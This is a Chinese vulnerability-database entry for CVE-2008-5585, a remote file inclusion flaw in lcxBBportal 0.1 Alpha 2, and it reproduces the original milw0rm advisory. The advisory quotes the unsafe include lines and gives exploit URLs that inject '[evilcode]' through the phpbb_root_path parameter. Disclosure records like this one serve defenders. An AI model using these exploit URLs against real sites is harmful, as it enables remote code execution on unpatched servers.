lcxbbportal 'phpbb_root_path' 参数多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116934 漏洞类型 代码注入
发布时间 2008-12-04 更新时间 2009-01-29
CVE编号 CVE-2008-5585 CNNVD-ID CNNVD-200812-270
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7341
https://cxsecurity.com/issue/WLB-2008120132
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-270
|漏洞详情
lcxBBportal是PHPBB门户的小模块,实现方便的块管理功能。lcxBBportal0.1Alpha2版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助对(1)portal/includes/portal_block.php和(2)includes/acp/acp_lcxbbportal.php的phpbb_root_path参数中的一个URL,执行任意PHP代码。
|漏洞EXP
=============================================================================================================


  [o] lcxBBportal 0.1 Alpha 2 Remote File Inclusion Vulnerability

       Software : lcxBBportal version 0.1 Alpha 2
       Vendor   : http://code.google.com/p/lcxbbportal/
       Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=============================================================================================================


  [o] Vulnerable file

       portal/includes/portal_block.php

	include($phpbb_root_path . 'includes/bbcode.' . $phpEx);

       includes/acp/acp_lcxbbportal.php

	$phpbb_portal_path = $phpbb_root_path . 'portal/';
	require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
	require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
	include($phpbb_root_path . 'includes/functions_display.' . $phpEx);



  [o] Exploit

       http://localhost/[path]/portal/includes/portal_block.php?phpbb_root_path=[evilcode]
       http://localhost/[path]/includes/acp/acp_lcxbbportal.php?phpbb_root_path=[evilcode]


=============================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
=============================================================================================================

# milw0rm.com [2008-12-04]
|参考资料

来源:XF
名称:lcxbbportal-phpbbrootpath-file-include(47092)
链接:http://xforce.iss.net/xforce/xfdb/47092
来源:BID
名称:32647
链接:http://www.securityfocus.com/bid/32647
来源:MILW0RM
名称:7341
链接:http://www.milw0rm.com/exploits/7341
来源:SREASON
名称:4738
链接:http://securityreason.com/securityalert/4738
来源:MISC
链接:http://packetstormsecurity.org/0812-exploits/icxbbportal-rfi.txt